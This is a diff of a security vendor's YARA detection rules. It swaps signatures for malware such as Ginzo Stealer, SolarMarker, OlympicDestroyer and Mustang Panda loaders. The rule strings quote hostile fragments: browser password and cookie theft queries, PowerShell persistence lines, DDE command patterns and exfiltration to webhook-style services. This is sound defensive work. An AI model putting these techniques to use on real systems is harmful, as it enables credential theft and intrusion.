-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_incontroller.yar#L4-L49"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "69296ca3575d9bc04ce0250d734d1a83c1348f5b6da756944933af0578bd41d2"
-		logic_hash = "988e3004169817758a38dc7cd621ed351dac4de41e6dad03ab1cdfc07b8a6cac"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_win_search.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "a29fa85ecfc0e5554c21f3b9db185de97b3504517403f4aa102adbd2c46dc1bf"
+		hash = "f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060"
+		logic_hash = "1b25f04d1d2c9b7bdc7e0bd17d2f2876c27f9c4acb3a2afca6a4df531e769740"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "AsRockDrv.sys" ascii
-		$ = "C:\\Users\\User1\\Desktop\\dev projects\\SignSploit1\\x64\\Release\\AsrDrv_exploit.pdb" ascii
-		$ = "found map in %.3f sec physical address : %016I64x" ascii
-		$ = "get physical regions error : %x!"
-		$ = "Device AsrDrv103 was opened successefuly!" ascii
-		$ = "Ioctl handler AsrDrv103 was found successefuly!" ascii
-		$ = "cant open the AsrDrv103!" ascii
-		$ = "can't read a unsigned driver ! " ascii
-		$ = "cant drop and load exploatable driver ! " ascii
-		$ = "please set unsigned driver as argument to program!" ascii
-		$ = "\\DosDevices\\AsrDrv103" wide
-		$t = "This program cannot be run in DOS mode."
+		tags = "FILE"
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	strings:
+		$ = "C:\\Users\\pc\\source\\repos\\Search\\Search\\obj\\Debug\\Search.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and 4 of them and filesize < 800KB and #t == 2 ) or pe.imphash ( ) == "f139e860bc959a7e65a008399425c090" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "a2fe4d32d74354c391a283178f0291e6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c33f9caa68fe46c6996a928ba5a38fd6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d9a1f1a4d48906da1d9f33eae0f0eaef" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "76426b0209a87fa32ca28e9f2361be67" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9e63a5064b755925598b8d72ace52dc9" ) or hash.md5 ( pe.rich_signature.clear_data ) == "140d7fb360dbebb03edab903b5d08285"
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Sidecopy_Actionrat_Packer_Strings : FILE
+rule SEKOIA_Apt_Uta0178_Javascript_Inclusion_Strings
 {
 	meta:
-		description = "Detects SideCopy's ActionRAT (packer?)"
+		description = "Detects UTA0178 malicious inclusion strings"
 		author = "Sekoia.io"
-		id = "b9370bd5-12e1-448e-a5b1-2acc72adc4a7"
-		date = "2023-05-11"
+		id = "af816c35-1f00-47ea-86ee-c034607c625e"
+		date = "2024-01-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sidecopy_actionrat_packer_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1bb6896ac3efa0e43cc27f56d7324ab9bdd2c401941eeefc4e7be62b407657af"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_uta0178_javascript_inclusion_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d3fedf49417178df374d6ae20e57ffcfa00cb68a647769964c049d9a8e0f4958"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "(HTTP/1\\.[01]) (\\d{3})(?: (.*?))?"
-		$ = "cpp-httplib/0.7"
-		$ = "\\HTTP Arsanel\\"
+		$s0 = ".value"
+		$s1 = "btoa("
+		$s2 = "https://"
+		$s3 = "new XMLHttpRequest();"
+		$s4 = ".send(null);"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		@s0< @s1 and @s1 < @s2 and @s2 < @s3 and @s3 < @s4 and @s4- @s0 < 350
 }
-rule SEKOIA_Apt_Cerana_Keeper_Dropboxflop : FILE
+rule SEKOIA_Infostealer_Win_Solarmarker_Powershell : FILE
 {
 	meta:
-		description = "Detects DropboxFlop malware"
+		description = "Finds SolarMarker PowerShell script based on characteristic strings"
 		author = "Sekoia.io"
-		id = "e077901f-3847-45f3-82cb-d52724cd3fb5"
-		date = "2024-10-04"
+		id = "a2fe7f09-7134-4054-ba40-5ea66785a26d"
+		date = "2022-12-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cerana_keeper_dropboxflop.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "2b65b74e52fbf25cb400dbdfcd1a06a7"
-		logic_hash = "5b2dfdf0c35f574e7006bb3e6eafa10d0e7fc7d980d443b31d4d6d6b7cec2fce"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_solarmarker_powershell.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "32267cf7e03ed65da969aeeff5ef5d7291e47446ea11a4b391f085967e8aa67d"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<assemblyIdentity type=\"win32\" name=\"dropboxflop\""
+		$fun = "function " ascii
+		$ps0 = "return -join (0..(10..30|Get-Random)|%{[char]((65..90)+(97..122)|Get-Random)})" ascii
+		$ps1 = /new-item -path \$[a-zA-Z0-9_]* -itemtype registrykey -force;/
+		$ps2 = /set-item -path \$[a-zA-Z0-9_]* -value \$[a-zA-Z0-9_]*;/
+		$str0 = "[IO.File]::WriteAllText($" ascii
+		$str1 = "CreateShortcut($env:appdata+" ascii
+		$str2 = "Registry::HKEY_CURRENT_USER\\Software\\Classes\\" ascii
+		$str3 = "New-Object System.Security.Cryptography.AesCryptoServiceProvider" ascii
+		$str4 = "[Convert]::FromBase64String([IO.File]::ReadAllText(" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		$fun at 0 and 1 of ( $ps* ) and 2 of ( $str* )
 }
-rule SEKOIA_Apt_Kimsuky_Sharpext_Compromised_Securepreferences
+rule SEKOIA_Implant_Win_Pingpull : FILE
 {
 	meta:
-		description = "Detects compromised Chrome SecurePreferences file"
+		description = "Detect the PingPull malware used by GALLUM in 2022"
 		author = "Sekoia.io"
-		id = "aeda5d15-82e1-4ffc-8252-1eb4fc78d024"
-		date = "2022-07-29"
+		id = "521615d4-912b-4581-b5a9-a8b158ac9496"
+		date = "2022-06-13"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_sharpext_compromised_securepreferences.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "662358fdb4c4cfa9984d06e391ade52e1c7a3d7b78724aea4fb0d6035fe2e7b2"
+		reference = "https://unit42.paloaltonetworks.com/pingpull-gallium/#Protections-and-Mitigations"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_pingpull.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "778d429e4c6d7575ddeea5144f9554f2b6ca46175d4202d338bef01dc9668b97"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\"devtools\", \"tabs\", \"webNavigation\", \"webRequest\", \"webRequestBlocking\""
-		$ = "AppData\\\\Roaming"
-		$ = "https://*/*"
+		$ = "PROJECT_%s_%s_%08X"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Hacktool_Ligolo_Strings : FILE
+rule SEKOIA_Infostealer_Win_Ginzostealer_Str : FILE
 {
 	meta:
-		description = "Detects ligolo based on strings"
+		description = "Finds samples of the Ginzo Stealer"
 		author = "Sekoia.io"
-		id = "5013256b-eda3-417e-ac72-959055b01c7e"
-		date = "2022-02-08"
+		id = "ef87e94b-9c53-44b4-b8a1-87d371a6d2cb"
+		date = "2022-04-21"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_ligolo_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "12609bed61ef4d86737bc652a75c74f01e4a251466129ff56da0d7e002566d50"
+		reference = "https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_ginzostealer_str.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b1c811a13cf0f632ac839b6a6de050fc59ffe3ed0704545feff02e13521ea53f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228242,102 +228825,135 @@ rule SEKOIA_Hacktool_Ligolo_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Restarting Ligolo..."
-		$ = "Ligolo starts a socks5 proxy server"
-		$ = "main.startSocksProxy"
-		$ = "main.handleRelay"
-		$ = "main.StartLigolo"
+		$str0 = "Ginzo.pdb" ascii
+		$str1 = "Ginzo.exe" wide
+		$str2 = "SELECT creation_utc,top_frame_site_key,host_key,name,value,encrypted_value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party FROM cookies" wide
+		$str3 = "SELECT origin_url,action_url,username_element,username_value,password_element,password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for,date_password_modified FROM logins" wide
+		$str4 = "SELECT id,originAttributes,name,value,host,path,expiry,lastAccessed,creationTime,isSecure,isHttpOnly,inBrowserElement,sameSite,rawSameSite,schemeMap FROM moz_cookies" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 2MB and filesize < 5MB and 3 of them
+		uint16( 0 ) == 0x5A4D and 4 of them
 }
-
-rule SEKOIA_Latrodectus_Exports : FILE
+rule SEKOIA_Apt_Stripedfly : FILE
 {
 	meta:
-		description = "detection based on the exports"
+		description = "Detects string relative to Stripedfly malware"
 		author = "Sekoia.io"
-		id = "29076cf5-f391-42f2-918f-e1c929bd368d"
-		date = "2024-07-03"
+		id = "81968d34-3247-4965-ba44-55747370c90e"
+		date = "2023-11-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/latrodectus_exports.yar#L3-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "01385f31b1f2fc94453a2ead136a1f7fb253a72bee95f74d755acfa97abdb26d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_stripedfly.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ded64ae30cf994162d4af649a34eadd4b8619cbced4392a6684129f8cf906136"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = "{\"id\":%d,\"jsonrpc\":\"2.0\",\"method\":\"%s\",\"params\":%s}"
+		$s2 = "{\"login\":\"%s\",\"pass\":\"%s\",\"agent\":\"\"}"
+		$s3 = "(tcp|ssl)://([A-Za-z0-9\\.\\-]+):([0-9]+)"
+
 	condition:
-		(pe.exports ( "stow" ) or pe.exports ( "homq" ) or pe.exports ( "scub" ) ) and pe.number_of_exports >= 3 and uint16( 0 ) == 0x5a4d
+		filesize < 3MB and 2 of them
 }
-rule SEKOIA_Apt_Sandworm_Orcshred_Apr2022 : FILE
+rule SEKOIA_Apt_Unc4990_Emptyspace_Pyc : FILE
 {
 	meta:
-		description = "Detects the ORCSHRED script"
+		description = "Detects Python Bytecode of EmptySpace"
 		author = "Sekoia.io"
-		id = "1a88800c-29e1-4e2c-8374-f5a93dd9fd91"
-		date = "2022-04-12"
+		id = "d970fd9c-1ce5-471c-96a1-146250f36b89"
+		date = "2024-02-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sandworm_orcshred_apr2022.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "de38cf43fa5cc756c26ae241f2e60636c2aabbe4254fdeca2340c62873498de7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unc4990_emptyspace_pyc.yar#L1-L43"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "98e9c848f6b6276815b040681d7f36548b367257bb75d133309e89e8572a50b7"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "find /etc -name os-release >"
-		$ = "/bin/bash /var/"
-		$ = "crontab -l >"
-		$ = ".sh & disown"
+		$ = "PYBOOTSTRAP"
+		$ = "http://google.com/generate_204"
+		$ = "from"
+		$ = "pathZ"
+		$ = "usernamez"
+		$ = "timeZ"
+		$ = "win32api"
+		$ = "base64Z"
+		$ = "json"
+		$ = "marshalZ"
+		$ = "BOOTSTRAP_VERSION"
+		$ = "getZ"
+		$ = "sleepZ    b64encode"
+		$ = "dumps"
+		$ = "executableZ"
+		$ = "GetUserNameExZ"
+		$ = "NameSamCompatible"
+		$ = "encode"
+		$ = "decodeZ"
+		$ = "request_dataZ"
+		$ = "server"
+		$ = "post"
+		$ = "raise_for_status"
+		$ = "exec"
+		$ = "loadsZ    b64decode"
+		$ = "text"
+		$ = "globals"
+		$ = "bootstrap.py"
+		$ = "<module>"
 
 	condition:
-		3 of them and filesize < 2KB
+		uint32be( 0 ) == 0x420d0d0a and all of them
 }
-
-rule SEKOIA_Typhon_Reborn_Stealer
+rule SEKOIA_Loader_Amadey_Clipper_Plugin : FILE
 {
 	meta:
-		description = "Typhon Reborn v2 string based detection"
+		description = "Finds Amadey's clipper plugin based on characteristic strings"
 		author = "Sekoia.io"
-		id = "aab7279b-b651-4092-b988-d186d0a433de"
-		date = "2023-05-15"
+		id = "487b6657-8834-45ee-8fd4-03df9c0dd7be"
+		date = "2023-05-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/typhon_reborn_stealer.yar#L3-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0db77a2e1d6b7274b0256fe469b72953c1b8598cbfc1715a43e5fbfa7899fe4c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_amadey_clipper_plugin.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6f5a2fa9c687f0fb2423ca97540d0173551dd04b31d092e4d47d6d7d22dfb965"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "api.telegram.org/bot" wide
-		$s2 = "TyphonReborn Stealer v2 log!" wide
+		$str01 = "CLIPPERDLL.dll" ascii
+		$str02 = "??4CClipperDLL@@QAEAAV0@$$QAV0@@Z" ascii
+		$str03 = "??4CClipperDLL@@QAEAAV0@ABV0@@Z" ascii
+		$str04 = "Main" ascii fullword
+		$str05 = "OpenClipboard" ascii
+		$str06 = "GetClipboardData" ascii
+		$str07 = "D:\\Mktmp\\Amadey\\ClipperDLL\\Release\\CLIPPERDLL.pdb" ascii
 
 	condition:
-		all of them and pe.is_pe
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SEKOIA_Tool_Rubeus_Strings : FILE
+rule SEKOIA_Apt_Mustangpanda_Decrypt_Payload : FILE
 {
 	meta:
-		description = "Detects Rubeus"
+		description = "Detects the decryption routine of DAT file"
 		author = "Sekoia.io"
-		id = "df1860d0-ec34-4c2d-bd83-5f16b26d075c"
-		date = "2024-03-22"
+		id = "7b954007-0929-454d-8a10-05279a337f1b"
+		date = "2022-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_rubeus_strings.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "adc6a5207bb15c8020ca170564ea9066b2c0b0e09839d6838744c623f59153cf"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_decrypt_payload.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dcc32580e351e605d21dc29558764c6fd85f8a9506de8e78f301459a5a2610b7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228345,67 +228961,63 @@ rule SEKOIA_Tool_Rubeus_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".Ndr.RPC_DISPATCH_TABLE32"
-		$ = ".Ndr.RPC_PROTSEQ_ENDPOINT32"
-		$ = ".Ndr.RPC_SERVER_INTERFACE32"
-		$ = ".Ndr.NDR_EXPR_DESC32"
-		$ = "$krb5tgs${0}$*{1}${2}${3}*${4}${5}" wide
-		$ = "$krb5asrep$23${0}@{1}:{2}" wide
-		$ = "Unable to decrypt the EncTicketPart using key:" wide
-		$ = "[*] Target service  : {0:x}" wide
+		$chunk_1 = {
+        85 ??
+        74 ??
+        8B ??
+        D1 EA
+        A1 ?? ?? ?? ??
+        03 C2
+        A3 ?? ?? ?? ??
+        30 04 29
+        41
+        3B ??
+        72 EC
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
+		filesize < 8MB and all of them
 }
-rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Loader : FILE
+rule SEKOIA_Technique_Csv_Dde_Exec_Regex : FILE
 {
 	meta:
-		description = "Detects VHD ransomware x64 loader "
+		description = "Find .csv file exploiting DDE technique"
 		author = "Sekoia.io"
-		id = "377f3ec5-fa2a-431e-93d2-6a1eb9e01d28"
-		date = "2022-11-28"
+		id = "71d0e987-51ab-49bc-9d0d-d2f9006af1de"
+		date = "2022-02-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_vhd_ransomware_loader.yar#L1-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "33000fd79b5aae59dcbf445bb4d0d65cf5f939f376a4e3d9e23e14b11ca297da"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/technique_csv_dde_exec_regex.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fd4c64ad094b8ed543cc6990f2e4f341bb38ba0b4d335347e5676475da94dc06"
 		score = 75
-		quality = 80
+		quality = 28
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { B8 64 [8] B8 75 [8] B8 6D [8] B8 70 [8] B8 2E [8] B8 62 [8] B8 69 [8] B8 6E }
-		$ = { 48 63 ?? ?? ??
-        48 8B ?? ?? ??
-        0F BE ?? ??
-        B9 ?? ?? ?? ??
-        48 6B ?? ??
-        48 8B ?? ?? ??
-        0F BE ?? ??
-        ?? ??
-        48 63 ?? ?? ??
-        48 8B ?? ?? ??
-        88 ?? ??
-        EB }
-		$ = { 25 00 73 00 5c [3-15] 25 00 64 00 25 00 64 00 2e 00 62 00 69 00 6e }
+		$cmd0 = /=\s*wmic\|/ nocase
+		$cmd1 = /=\s*cmd\|/ nocase
+		$cmd2 = /=\s*wscript\|/ nocase
+		$cmd3 = /=\s*cscript\|/ nocase
+		$cmd4 = /=\s*powershell\|/ nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 2 of them
+		any of ( $cmd* ) and filesize < 20000
 }
-rule SEKOIA_Apt_Konni : FILE
+rule SEKOIA_Apt_Sandworm_Olympicdestroyer : FILE
 {
 	meta:
-		description = "Rule based on structure offsets and file extension"
+		description = "Detects OlympicDestroyer malware"
 		author = "Sekoia.io"
-		id = "6a20c492-e932-41bd-ac4a-01d35bfb0c49"
-		date = "2022-09-12"
+		id = "6820eb32-fea2-4a00-a5a2-672ba09f8206"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_konni.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8f178421fd0968f4ce809054022579c7fc8dede5f6514e89966d13acb83d75d9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sandworm_olympicdestroyer.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a68a96ab036e69a32e173b2d2fa6a81ab872032f89bfdfc3cd4446305a33921b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228413,31 +229025,28 @@ rule SEKOIA_Apt_Konni : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ext_1 = ".zip" wide ascii fullword
-		$ext_2 = ".cab" wide ascii fullword
-		$ext_3 = ".rar" wide ascii fullword
-		$ext_4 = ".ini" wide ascii fullword
-		$ext_5 = ".dat" wide ascii fullword
-		$offset_structure_1 = { 8d ?? 08 02 00 00 }
-		$offset_structure_2 = { 8d ?? 10 04 00 00 }
-		$offset_structure_3 = { 8d ?? 18 06 00 00 }
-		$url = "%s/dn.php?name=%s&prefix=%s" wide
+		$ = "cmd.exe /c (ping 0.0.0.0 > nul)" wide
+		$ = "if exist %programdata%\\evtchk.txt" wide
+		$ = "\\\\.\\pipe\\%ls" wide
+		$ = "%ProgramData%\\%COMPUTERNAME%.exe" wide
+		$ = "(exit 5) else ( type nul >" wide
+		$ = "Select * From Win32_ProcessStopTrace" nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of ( $ext_* ) and all of ( $offset_structure_* ) and $url
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Hacktool_Microsocks_Strings : FILE
+rule SEKOIA_Generic_Bat_Script_Mock_Http_Services : FILE
 {
 	meta:
-		description = "Detects Microsocks"
+		description = "Generic rule detecting BAT script using mock HTTP services (used by APT28)"
 		author = "Sekoia.io"
-		id = "20e82008-249b-47a3-885b-7c4b04b31a57"
-		date = "2023-12-08"
+		id = "1cfbe5ba-6304-476d-8308-928100a85c16"
+		date = "2023-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_microsocks_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b76b66fbdd9a7e2ea8adb68781d6b14c18189a8b330a61c2a65e7394ef8024c3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_bat_script_mock_http_services.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d34be59cfb054895381580e7852bba6b899cfb680882b7fd24a72438131c3bee"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228445,49 +229054,60 @@ rule SEKOIA_Hacktool_Microsocks_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "microsocks -1 -i listenip -p port -u user -P password"
-		$ = "user/pass, it is added to a whitelist"
+		$bat1 = "@echo off"
+		$bat2 = "chcp 65001"
+		$ps1 = "WebClient"
+		$ps2 = "UploadString"
+		$dom1 = "mockbin.org"
+		$dom2 = "webhook.site"
+		$dom3 = "mocky.io"
+		$dom4 = "pipedream.com"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		(1 of ( $bat* ) or 1 of ( $ps* ) ) and 1 of ( $dom* ) and filesize < 2000
 }
-rule SEKOIA_Gen_Empire_Onedrive_Stager
+rule SEKOIA_Apt_Mustangpanda_Xoreddll : FILE
 {
 	meta:
-		description = "Detects the Empire OneDrive stager"
+		description = "Detects xored DLL from MustangPanda embedding a document"
 		author = "Sekoia.io"
-		id = "2053416f-1f53-491e-9c70-787a04362d16"
-		date = "2022-01-26"
+		id = "73d13624-01df-41ab-b449-86db43dc6c55"
+		date = "2022-07-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/gen_empire_onedrive_stager.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "90b3548cd3f4f7f936da70ec95dbe0ff3c1421d40a6e8557952d28d358b7c1f1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_xoreddll.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "685be191cf187c0d5bfd00354400c47a961c9d047aa7e65e4cfc2201ec5eb1bc"
 		score = 75
-		quality = 76
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$sleep = "Start-Sleep -Seconds $(($PI -as [Int])*2)" wide ascii nocase
-		$down = "wc.DownloadData" wide ascii nocase
+		$clear = "This program cannot be run in DOS mode"
